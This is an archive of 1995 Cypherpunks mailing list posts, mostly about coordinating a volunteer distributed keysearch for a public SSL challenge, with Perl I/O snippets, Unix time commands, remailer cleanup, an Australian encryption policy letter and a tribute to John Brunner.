>will produce an overall system that adapts with time to the cahges in
>network and system usage so as to optimize overall performance as a
>function of time.

You could do that.  But simply asking for more numbers after you've
finished the previous batch accomplishes much the same thing;
special tuning may be more useful for folks with MasPars than 486s,
where redundantly giving out unacked search space can do more.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 11:53:07 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508281852.OAA22478@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Patrick Horgan <patrick@Verity.COM> writes:
>I did a distributed scheme for something else that had two levels, a master
>and a group of slaves.  Only the slaves talked to the master.  For this 
>effort I think a variation of the idea would be better.  Have all of the
>brutes contact the master, who will, in the first transaction assign them
>to the next slave in a round-robin fashion.

Why not just have the brutes pick a slave at random?  Of course, you need
to give them a complete list of slaves to choose from.  But then the only
difference between the master and the slaves will be that the master
doesn't get any keyspace (it's got it all to begin with) and doesn't
report any results upward.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEIKkhEcrOJethBVAQHjVQP/RGGxRkUp2WB1/yWngAIrGG3m7Xo6CG17
2sODkkDDGJYmGV+wDBLWObc7VS30MHrPfMLT7Cp7yI/AgYgDJrZ/1SRKw2OuVFqI
kgL8hICRxqe76IvmlFAa/pFXVgYiu+WHsMlSEKYlpLa7T424HUdAD21Rc2Dvqioi
zMqmhgdn22I=
=QAi2
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 11:55:00 PDT
To: cypherpunks@toad.com
Subject: Re: Pre-allocating key segments
Message-ID: <199508281854.OAA23029@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Piete Brooks <Piete.Brooks@cl.cam.ac.uk> writes:
>I wrote:
>> Not only that, but the client ought to allocate some keyspace before it
>> needs it, as I think one other cpunk suggested.
>
>I'd prefer to keep the number of segments "lost" if a brloop ceases.

Keep down, I guess you meant.

Regarding the local farm software:
>... if any keys were allocated to machines which failed to ask for another
>segment -- you should assume that that segment was not searched.

I agree that is the best policy -- it fails safe -- but I still think the
prefetching of some more segments would be useful.  The goal is to suck up
as many idle cycles as is practical.

>> For instance, if it has
>> four segments allocated and it's done three of them, it should fork a
>> process to begin requesting four more segments *while* it is scanning
>> the last segment, rather than waiting until after it is done and leaving
>> the machine idle until it can alloc more keys.
>
>That means that if it crashes, 8 segments are left unACKed :-(

And if it had grabbed 8 segments to begin with and crashed, it still
would have been 8 segments left unACKed.

Plus, it's only 8 segments unACKed if it crashes before it finished that
last segment, since it will start trying to ACK the first four segments
when it finishes the fourth -- at the same time starting on the next
four segments.

Would you see it any differently if I had said, "For instance, if it has
two segments allocated and it is halfway through the second segment, it
should request two more segments *while* it is scanning the last segment"?

Keeping in mind that it will still ACK the first bunch of segments when
it finishes them.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEIOnBEcrOJethBVAQHUfQP+OUA+iC7sTp2CVCZ5YqtM7ouNykhyx7Nm
agcTHN6FFZUOxDmAogiY/Op/SLBZbgtmACC3RSG0cEHwzCQJZ6jeUrTe9g3qU/Vm
jHRn8PurOUYE188QnZSGEj0qcZbeoYJoLE4qOcrd7SbizIcZoWk/WVA4STZwEHuH
wHHusza6Un4=
=UOqi
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 28 Aug 95 06:11:46 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508281310.AA21354@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>

>We were using ALPHA code when we started ....

I didn't realise that.


>(4) is still applicable isn't it ?
>What tells people to stop, or do they go on for ever ?

A message in a newsgroup, a mailing list, or a web page.  Even if you
can mount a denial-of-service against this, it will only make people
continue the search uselessly.  It won't prevent you from finding the
key.


>>The main drawback of the random search is that the expected running "time"

>where "expected" is some loose average .....

Nope.  It's what I get when I do the math (basic probability theory)
to find the expected running time.  But I could be wrong.  I'll try to
write it in TeX and put it on my web page.


>>I suspect that sequential searching from a random starting point would be
>>much worse in the case of many independent searchers.

>Convince me (please) ....

That would be hard because I've been thinking about it, and I'm less
and less convinced myself.


>> In conclusion, I think random searching is the way to go.
>It has its advantages -- yes. Did you use it for Hal1 ?  :-))

No, but I had few machines and fast connections (and even then, I did
have some network problems).  But if you think sequential searching
can work, let's do it.  I don't think we have to worry about
deliberate attacks for the moment, and the factor of two is
significant.  My previous message was based on the assumption that it
would be hard to get rid of the server overload.

Maybe we should use random searching as a fallback mode in case of
network problems.  It cannot hurt, except that it makes the programs
more complex.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 28 Aug 95 13:14:43 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508262332.TAA26817@interport.net>
Message-ID: <9508282013.AA15087@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Will French writes
>>>   Please don't do anything like this.  This will prevent
>>> people like me who prefer the "random" method from
>>> participating.
>
>> You can't use the random method if the CRACK is using a
>> sequential search. It just doesn't fit!
>
>  Hehe...  I've always been a bit of a misfit.
>
>> You can't ACK something which has not been allocated to you.
>
>  But I could announce it on the list.

Then what do you care about the group's procedures?  It doesn't
"prevent you from participating" --- you *aren't* participating.
You're attempting to solve the problem on your own.

Statistically, the "random" methods are no different than everyone just
working independently at solving the problem.

I, too, don't recall my statistics well enough, but let me take a shot
at it, and anyone who wants to, please check me...

The probability of having failed to search a particular segment (the
one with the key) after selecting k of n segments at random with
replacement is (1-1/n)^k, whereas in a sequential search from a random
starting point, (or, equivalently, random without replacement) the
probability is k/n.

Assume the segments are farmed out in 2^24 segments of 2^16 keys each
(I don't recall what the current programs use).  In the sequential case,
it's even money you'll find the key after searching 8,388,609
segments.  In the random case, it's not even money until 11,629,080
segments --- 39% longer.  It's when you're "unlucky" that the random
case gets *much* worse.  To search 90% of the keyspace takes 15,099,495
sequential searches, but 38,630,967 --- a 156% difference.

Here's the table:

% k-space	  random	sequential	percent
searched	  method	  method	difference
--------	----------	---------	----
10		   1767657	  1677722	  5
25		   4826505	  4194305	 15
50		  11629080	  8388609	 39
75		  23258160	 12582913	 85
90		  38630967	 15099495	156
99		  77261933	 16609444	365
99.9		 115892899	 16760439	591

Changing the segment size doesn't affect the results very much, as
a table for 10 bit segments shows:

50		 744261117	536870912	 37
90		2472381916	966367641	156

The random method is a little more than 1/3 worse in the typical
case, but *lots* worse in the worst cases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 27 Aug 95 23:51:51 PDT
To: mark@lochard.com.au (Mark)
Subject: Auto-update (was: Re: SSl challenge - it was fun!)
In-Reply-To: <199508280134.AA19987@junkers.lochard.com.au>
Message-ID: <199508280649.QAA12896@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if I stuff up; I'm trying for PGP-signed and the PGP is on
a different machine...

-----BEGIN PGP SIGNED MESSAGE-----

Hello Mark <mark@lochard.com.au>
  and scmayo@rschp1.anu.edu.au (Sherry Mayo)
  and cypherpunks@toad.com

...[asking for an auto-update]...

> I would be extremely wary of this as accepting code written by someone else to
> automatically run on your machine is bad.
...

Why?

I wouldn't say "bad".

I'd say "you need to know what you are doing".

...
> If they do
> not have the expertise, they will hear of it soon enough when others scan the
> offered code.
...

Perhaps there should be a mechanism whereby code offered would be
signed by various parites. When sufficient signatures have collected,
auto-update can proceed.


Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEFmuixV6mvvBgf5AQEkRwP/TUorbtcmElHjWVrxJ8KoTlM0D3/oK4xh
Jh4+QLGaH/aNvI5ehdhPjn+tFXwL/ONS+J/pzO0b2cP9GcM3D6PvtUWxmsTwwaMh
jXkctAPIuO24nb0cAXtcj7LlUe4s5DqIVvkCYi8UrdPXrYEV5DaKti4MYD7oShgC
XMkzzcv55bQ=
=wa8h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 28 Aug 95 14:07:52 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL trouble
In-Reply-To: <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>
Message-ID: <RAA13233.199508282105@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>, Piete Brooks writ
[...]
>PS1: PERL gurus: Anyone know how to test whether there is input waiting on a
>     file handle ? I know about seeing if there is data waiting for the next
>     sysread type read, but not on the next <SERVE> type read. Ideas ?

I don't think there is one.  I would just use select() on FD, and then
a subrutine much like this:

sub syswrite {
    local($FH, $buf) = @_;

    local($len, $offset, $wlen) = (length($buf), 0, 0);

    while($len) {
        $wlen = syswrite($FH, $buf, $len, $offset);
        die "Bad write $FH: $!" if (!defined($FH));

        $offset += $len;
        $len -= $wlen;
    }
}


Actually if you can use perl5 for the server (I assume this is the
server code you are worrying about) I have code that deals with
I/O from multiple sockets at once and drives an independant state
machine for each socket.

>PS2: PERL gurus: I fixed the SGI Challenge problem by HACKing it -- as I
>     thought it was a probleb with stdio in and out on the same socket.
>     The perl mand page warns:
>	If  your  stdio  requires an seek or eof between reads and
>	writes on  a  particular  stream,  so  does  perl.   (This
>	doesn't apply to sysread() and syswrite().)
>     so I change the one "print SERVE" line to a "syswrite(SERVE" and that
>     fixed it. However, does anyone know the "correct" way to use stdio for I/
>O?

For bi-directional pipes I tend to use sysread/syswrite anyway, but
you could just sprinkle "seek(SERVE, 0, 1)" liberally through the
code.

>PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
>     use "time", and I can't see a way to get "date +" to yield the raw time.
>     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
>     may not be on teh users PATH. Any suggestions ?

"date '+%s'" does it under BSDI, but I'm not sure how portable it is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 28 Aug 95 14:29:36 PDT
Subject: Re: SSL trouble
In-Reply-To: <RAA13233.199508282105@garotte.va.pubnix.com>
Message-ID: <RAA13413.199508282126@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <RAA13233.199508282105@garotte.va.pubnix.com>, "Josh M. Osborne" wri
tes:
[...]
>sub syswrite {
[...]

So sorry.  I gave out the wrong code.  Let me try again:

sub sysreadln {
    local($FH) = @_;

    local($len, $line, $offset) = (0, "", 0);
    
    while("\n" ne substr($line, $offset-1, 1)) {
        $len = sysread($FH, $line, 1, $offset);
        die "Bad read from $FH: $!" if (!defined($len));
        $offset += $len;
    }

    return $line;
}

There.  That should help.

(yes, this is slow since it asks the OS for a single byte at a time,
but in practice it isn't too bad - I use it for small tasks and my
multi-stream state-machine monster for the rest)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 17:38:36 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: Florida Drivers Permits
Message-ID: <199508290035.RAA08342@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 AM 8/29/95 +1000, you wrote:
>>>Better would be to figure out the encoding scheme and post it here.
>>I like this, myself.  It'd be nice to be able to have the picture of my
>>choosing instead of a digitized thumbprint...
>
>I think the officer arresting you would frown if your license dumped a nudie
>picture of Cindy Crawford instead of your identification details.

Yeah, but your basic thumb-shaped black smudge might look believable...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 28 Aug 95 14:50:24 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950828174849.14722A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain





It's been far too long since I cleaned up the namespace clutter on
alpha.c2.org.  So I have deleted all reply blocks which point to
remailer@jpunix.com, remailer@tower.techwood.org, usura@replay.com,
myriad, wmono, desert, nately, and all the other dead remailers I could
think of.  I did this with a grep/awk script, so I hope it didn't maul
any valid addresses.  There are probably still a lot more dead addresses,
but hopefully this cleans up the namespace somewhat.


[...]


THE FOLLOWING HAVE BEEN DELETED:

abdul
alexr
alice
an34267
anna
avatar
beaver
blacknet
^^^^^^^^
bolt_thrower


Uh oh!  :)



---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 28 Aug 95 17:48:03 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v0213050bac681eb58454@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 PM 8/28/95, Mark wrote:
>>>Better would be to figure out the encoding scheme and post it here.
>>
>>I like this, myself.  It'd be nice to be able to have the picture of my
>>choosing instead of a digitized thumbprint...
>
>I think the officer arresting you would frown if your license dumped a nudie
>picture of Cindy Crawford instead of your identification details.
>
>Sounds like a great way to smuggle nuclear secrets out of a country tho :)

What is the capacity of the mag strips. Do they carry much more than some
ID code for computer reference? It seems unlikely that there is enough
storage
for a thumbprint. Some vitals perhaps, but again it would most likely simply
be a speedier way of referencing the card holder's supposed True Name. (After
all they'd have to be checking driving record information as well.) Still
decrypting the cards would be amusing, just to aggravate those who become to
used to the convienience. 'Oh.. sorry Governor Wilson... my but you look
different up close'.


Being in California, I've avoided getting a Cali license due in large part
to the use of thumbprints. Perhaps I'm being silly, but I find it difficult
to give up such vitals. Its the sheeplike way the majority of the
population happily gives up its remnants and shreds of privacy which makes
this such an
important area.

As for the Hello mentioned in the subject line... A few of you may know me
already. I work for Consensus Development. We're going to be able to
license out RSARef commercial use quite soon. Some of the people I've
talked to have asked me to jump on Cypherpunks, so I've been going over the
archives on the Cypherpunk list, and while rather large, I'm quite pleased
to see the high content/noise ratio here. Anyway, my task is to get in gear
as the Knowledge Officer for RSARef, and I am currently putting together
the new RSARef discussion lists. Since I don't have the constitution (or
obligation) to be
a salesperson I'll leave the RSARef stuff at that. If you do have questions,
or want to be put on the RSARef announcement list, drop me an email.

Jonathan Zamick
(Off to play with PGPFone.... how happy am I? :)

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 09:55:44 PDT
To: ab411@detroit.freenet.org
Subject: Re: Pre-allocating key segments
In-Reply-To: <199508281410.KAA16345@detroit.freenet.org>
Message-ID: <"swan.cl.cam.:184040:950828165514"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> If the client is unable to retrieve a block from the server, I suggest
>> it just picks a random block and starts working on it. I may very
>> well not be allocated to someone else, and then the client was able
>> to do something good in the meantime even though it didn't get a
>> proper key alloc. 
> Not only that, but the client ought to allocate some keyspace before it
> needs it, as I think one other cpunk suggested.

I'd prefer to keep the number of segments "lost" if a brloop ceases.

I have written a "local CPU farm" caching server which runs on a robust
machine and grabs chunks from the root server and farms them out to local
machines (running as the same "ID").
This logs all the client transactions so that you can work out if any keys were
allocated to machines which failed to ask for another segment -- you should
assume that that segment was not searched.

With the Big Boys using that, and better code, I hope that server congestion
will not be a problem.

> For instance, if it has
> four segments allocated and it's done three of them, it should fork a
> process to begin requesting four more segments *while* it is scanning
> the last segment, rather than waiting until after it is done and leaving
> the machine idle until it can alloc more keys.

That means that if it crashes, 8 segments are left unACKed :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 28 Aug 95 16:04:04 PDT
To: stripes@va.pubnix.com
Subject: Re: SSL trouble
Message-ID: <9508282302.AA12759@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



>
> >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> >     use "time", and I can't see a way to get "date +" to yield the raw time.
> >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> >     may not be on teh users PATH. Any suggestions ?
>
> "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>
 
This is what I got from SunOS 4.1.x
 
        $ date +%s
        date: bad format character - s
 
Sounds like something my parents might have said ;-)
 
Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 28 Aug 95 16:23:45 PDT
To: stripes@va.pubnix.com
Subject: Re: SSL trouble
Message-ID: <9508282322.AA12838@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> >     use "time", and I can't see a way to get "date +" to yield the raw time.
> >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> >     may not be on teh users PATH. Any suggestions ?
> 
> "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
> 

That doesn't work under SunOS 4.1.x, but this does:

   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc

This assumes 365 days/year, so if you jump from a leap year to a non-leap
year it won't work right.  Hey - a 1/1460 failure rate is better
than most Windoze programs I've used ;-)

It also isn't the "absolute" time, (as given by time()), but
gives a number of seconds that constantly increases.
 
With a little more work you should be able to adjust this to be close
to time() functionality.


Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:51:28 PDT
To: cypherpunks@toad.com
Subject: Re: R.I.P. John Brunner
Message-ID: <ac67bd0f07021004b3b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 8/28/95, Alan Bostick wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Science fiction writer John Brunner died last Friday, August 25, from
>a massive stroke, while attending the World Science Fiction Convention
>in Glasgow, Scotland.
>
>Among several other notable works, Brunner was the author of THE SHOCKWAVE
>RIDER, a groundbreaking vision of the information age that inspired and
>forsaw much that was pertinent to the Internet in general and the
>Cypherpunks in particular.
>
>Let us pause a moment to note his passing and honor his life and
>contributions.

I am saddened to learn this.

And, yes, this has a lot to do with Cypherpunks. I read "Stand on Zanzibar"
with rapt attention in 1969 or so, and it had a big influence on me.

Ditto for "The Shockwave Rider," one of the very first explications of how
identities would be changed, how the State would insist on computerized
identities. (Indeed, "1984" came first, and is an even more important work,
by any standards, but Brunner still nailed the effects of computers in a
way that Orwell could not possibly have.)

Christ, what an imagination he had!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Mon, 28 Aug 95 16:06:31 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP, telnet, etc
In-Reply-To: <199508280514.XAA00277@wero>
Message-ID: <m0snD2H-000wcWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


root <root@wero.toad.com> wrote:
>But I missed where this comes from, and I doubt I'd be able to
>drop it into my Linux in anything resembling a plug-and-play
>style. Anybody tried this?

I am using it.  It works fine on Linux and was very easy to set up.
Just -DLINUX in the makefile and build it.  Then put it in your inetd
or start the server standalone.  I use
% cryptod 49374 &
to put it on port 49374 (Look at it in hex ;-)

My biggest gripe with it is that it doesn't like Sparcs too much.
I finally did get it to compile but it still seems to occasionally
crash during key-exchange for no apparent reason. :(
Which is weird because it never crashes under Linux.  oh well.

I'm using v0.9, which I got from utopia.  Is there a newer version?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 05:02:11 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Law enforcement and PGP ban in Australia
Message-ID: <199508280756.AA24358@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>X-News: uqvax aus.net.policy:286
>From: Peter Merel <pete@extro.su.oz.au>
>Subject:Open Letter from Steve Orlowski
>Date: 18 Aug 95 06:52:32 GMT
>
>I've received something that purports to be an open letter from Steve
>Orlowski. Be warned that the letter has no digital authentication with it,
>so it may have been forged. However it reads like the real magilla, so I'll
>post it here in the hope that it might inform debate a little.
>
>
>--------------------- cut here ----------------------------
>
>
>Dear
>
>Thank you for your comments on the subject of the use of encryption by private
>individuals.
>
>Firstly I would like to make the point that the debate has arisen from one
>person's interpretation of a paper I gave at a conference on "Cryptography
>Policies and Algorithms"  The full text of that paper is now available on the
>net at
>
>	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html
>
>The paper carries a disclaimer at the top that the views are mine and do not
>necessarily represent the views of the Australian Government.  The paper sets
>out the Government's policy on telecommunications interception, which includes
>the issue of the use of cryptography as:
>
>"As a result of the Report, Australia is, among other TI issues, monitoring the
>impact of encryption in the telecommunications interception area and will
>re-examine matters in 1997 following the opening of the telecommunications area
>to full competition."
>
>Telecommunications covers both voice and data communications.
>
>The last paragraph of the paper says that there is a need to expand the
>cryptography debate to cover the needs of individual users in the context of
>the information superhighway rather than current Internet users.  The paper
>also points out that issues such as cost, convenience and public confidence in
>cryptography systems will be the main issues.  Public confidence is explained
>in terms that as long as it meets the general requirement for privacy it will
>be acceptable.  I still maintain that the general user of the superhighway  in
>the next century will be satisfied with a lower level of encryption which will
>meet that and cost and user friendliness requirements.
>
>On specific point made in the Internet message, the paper does not suggest,
>either directly or by implication, that individuals should be banned from using
>encryption.
>
>Regarding the use of higher level encryption, the paper supports the concept of
>commercial key escrow where organisations hold their own keys but may be
>required to provide them in response to a court order.  the same would apply to
>individuals who could either hold there own keys or store them with a
>commercial body.  Access to those keys would be by court order and in that
>respect is no different to existing procedures for the interception or seizure
>of telephone conversations or paper records.  There is no suggestion that these
>basic principles, and protection of individual's rights in general, should be
>changed
>
>If individuals were to use lower level encryption there would be no need for
>them to maintain copies of any keys for such systems.  To my mind this is
>preferable to a requirement for keys to be maintained for all encryption
>systems, which could be the result if universal key escrow were introduced.
>
>Finally on the question of interception, the general public expects a
>reasonable level of law enforcement to ensure the protection of their person
>and property.  Governments are required to find a balance between this and the
>rights of individuals to privacy.  Part of this balance is to ensure that law
>enforcement authorities convince a court that there is a need to carry out an
>interception.  There is no suggestion that this fundamental approach should be
>changed.  The paper certainly does not suggest that the Attorney-General's
>Department should become a centralised interception authority.  In fact such a
>role would not be consistent with its role as a source of advice to Government.
>
>I hope the above clarifies both the Government's policy and my personal views
>on these matters.
>
>I consider this to be an open letter and have no objection to it being used as
>such.
>
>Yours sincerely
>Steve Orlowski



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 11:16:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: SSL trouble
In-Reply-To: <9508281635.AA19987@cantina.verity.com>
Message-ID: <"swan.cl.cam.:216660:950828181616"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I did a distributed scheme for something else that had two levels, a master
> and a group of slaves.  Only the slaves talked to the master.  For this 
> effort I think a variation of the idea would be better.  Have all of the
> brutes contact the master, who will, in the first transaction assign them
> to the next slave in a round-robin fashion.

Well, imagine my suprise  ....  [[ reference to ISIRTA ]]

One of the things that the latest brloop does is make a call to the master
server asking for a list of servers to contact :-))

Note that it is a list, and it tries them in order (all A RRs).

> Then all of the transactions from that point would take place between the
> brute and the slave:)

Currently just all the "allocate" transactions -- I haven't written my
ACK reflector yet, so all ACKs go direct th the ACK master.

> The slaves would each be delegated large chunks of the keyspace,

No -- the slaves will not "be delegated" (as in pre-assigned address space),
they will just ask the master for it as they need it.
Sure, the'll do it in reasonable sized chunks, but not (2**16)/16 ....

> but not keyspace/numslaves.  Maybe 1/16th or something like that, and could
> ask for more when their space was depleted.  Periodically, perhaps when
> requesting more key space, and/or when a timer pops, the slaves could report
> results.

Nah - results still go direct pro tem.

> What I mean is that every so often they'd report even if they didn't need
> more keyspace yet, iff they had any new stats to report.

Sure.

> The nice thing here is that the work of the master and of the slaves is
> almost the same.i

You got it !

> The slaves don't have to do the initial assignment of slave,
(slave -> slaves I assume)

> and the master doesn't have to report results, but everything else
> is the same.

Yup -- code sharing !

> With careful design you could use the same daemon for both
> with a command line argument to tell it if it was the master (-m) or the
> slave (-s).

Well, not even that !

The slaves don't have the config file with the key info in it ...

> Of course I'm sure you see that this allows you to add as
> many levels as you want to the hierarchy.

Indeed.

BUT ....

These cache servers are asking for non trivial amounts of keyspace.
As such there should not be *too* many, and then need to be "managed" ...
If one crashes, the logs need to be scanned to see how to restart it (so that
it starts by doling out the segments that it had no sub-doled to its clients).

> A slave doesn't care whether a slave or a brute talks to it.

Indeed -- that's how it was designed ...

However, note that with big cache servers (as opposed to Local CPU Farm servers
where all clients are the same "ID") reports of sub-allocation have to be
passed back to the root :-(

> You could make the slave software available as well, and a site with many
> machines could have only the slave contact the master to get assigned a
> slave to talk to, and could configure all of their brutes to talk to
> their own slave.

Indeed -- the Local CPU Farm cache server is just about ready for ALPHA testers

> Software like this is easy to write, (and fun), and we should go for it:)

Done ...

> Of course I do everything like this in C++, but I suppose perl would be the
> most portable.  It's a shame it's so aethestically displeasing to the eye.

Yeah -- but being based on C, C++ didn't stand much chance ...

> perl's never a pleasant read.

... but better than C++ -- sure.


PS1: PERL gurus: Anyone know how to test whether there is input waiting on a
     file handle ? I know about seeing if there is data waiting for the next
     sysread type read, but not on the next <SERVE> type read. Ideas ?

PS2: PERL gurus: I fixed the SGI Challenge problem by HACKing it -- as I
     thought it was a probleb with stdio in and out on the same socket.
     The perl mand page warns:
	If  your  stdio  requires an seek or eof between reads and
	writes on  a  particular  stream,  so  does  perl.   (This
	doesn't apply to sysread() and syswrite().)
     so I change the one "print SERVE" line to a "syswrite(SERVE" and that
     fixed it. However, does anyone know the "correct" way to use stdio for I/O?

PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
     use "time", and I can't see a way to get "date +" to yield the raw time.
     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
     may not be on teh users PATH. Any suggestions ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 05:02:35 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Auto-update (was: Re: SSl challenge - it was fun!)
In-Reply-To: <199508280649.QAA12896@sweeney.cs.monash.edu.au>
Message-ID: <199508280818.AA67660@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>...[asking for an auto-update]...
>> I would be extremely wary of this as accepting code written by someone else
>>to automatically run on your machine is bad.
>...
>
>Why?
>
>I wouldn't say "bad".
>
>I'd say "you need to know what you are doing".
>
>...
>> If they do
>> not have the expertise, they will hear of it soon enough when others scan the
>> offered code.
>...
>
